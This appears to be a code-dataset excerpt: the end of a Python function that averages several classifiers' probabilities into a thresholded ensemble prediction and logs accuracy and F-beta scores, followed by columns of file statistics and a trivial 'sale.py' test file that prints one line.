baseline_models.run_models_wrapper(x=input_features, y=output, run_cv_flag=run_cv_flag,
num_model_iterations=num_model_iterations,
plot_learning_curve=plot_learning_curve,
run_prob_predictions=run_prob_predictions, return_yprob=True,
classification_threshold=classification_threshold,
clf_class=model_names[model_key], **model_parameters[model_key])
y_predicted_ensemble = actual_output_values['model0'].copy()
y_predicted_prob = np.zeros(len(actual_output_values['model0']), dtype=float) # Reset for every sample
# # Create ensemble probability by averaging output probabilities from each model
# # Then apply classification threshold on the averaged probability
for sample in np.ndindex(predicted_output_values['model0'].shape):
for actual_key_name in actual_output_values.iterkeys():
# Sum probabilities for each sample from the different models
y_predicted_prob[sample] += predicted_output_values[actual_key_name][sample]
# Average probability
y_predicted_prob[sample] /= num_of_models
# Need to have either numerator or denominator in round() as float to roundup
if y_predicted_prob[sample] > classification_threshold:
y_predicted_ensemble[sample] = 1
else:
y_predicted_ensemble[sample] = 0
accuracy_value = baseline_models.accuracy(actual_output_values['model0'], y_predicted_ensemble)
beta = 2.0
prec_recall = precision_recall_fscore_support(y_true=actual_output_values['model0'], y_pred=y_predicted_ensemble,
beta=beta, average='binary')
# Log Accuracy and precision / recall values for the ensemble
logger.info(sf.Color.BOLD + sf.Color.DARKCYAN + "\nEnsemble output for test data" + sf.Color.END)
logger.info(
sf.Color.BOLD + sf.Color.DARKCYAN + "\nAccuracy {:.2f}".format(accuracy_value * 100) +
sf.Color.END)
logger.info(
sf.Color.BOLD + sf.Color.DARKCYAN + "\nPrecision {:.2f} Recall {:.2f} Fbeta-score {:.2f}".format(
prec_recall[0] * 100, prec_recall[1] * 100, prec_recall[2] * 100) + sf.Color.END)
# Returns precision / recall for the ensemble at the given classification threshold
return prec_recall
##################################################################################################################
| 48.781818
| 117
| 0.619332
| 922
| 8,049
| 5.137744
| 0.191974
| 0.035465
| 0.049398
| 0.02871
| 0.745197
| 0.729576
| 0.729576
| 0.712687
| 0.712687
| 0.69411
| 0
| 0.011891
| 0.22686
| 8,049
| 164
| 118
| 49.079268
| 0.749317
| 0.192943
| 0
| 0.717391
| 0
| 0
| 0.075232
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.021739
| false
| 0.01087
| 0.076087
| 0
| 0.119565
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
df4809c38aaf328499929b2ee7d7407ebc573ea2
| 40
|
py
|
Python
|
sale.py
|
SRtsuki/SELab02
|
33a3728e2141838f3c797c1df40b1aa1758f23fd
|
[
"MIT"
] | null | null | null |
sale.py
|
SRtsuki/SELab02
|
33a3728e2141838f3c797c1df40b1aa1758f23fd
|
[
"MIT"
] | null | null | null |
sale.py
|
SRtsuki/SELab02
|
33a3728e2141838f3c797c1df40b1aa1758f23fd
|
[
"MIT"
] | null | null | null |
# sale.py
print("This is a test file.")
| 13.333333
| 29
| 0.65
| 8
| 40
| 3.25
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.175
| 40
| 2
| 30
| 20
| 0.787879
| 0.175
| 0
| 0
| 0
| 0
| 0.645161
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 6
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.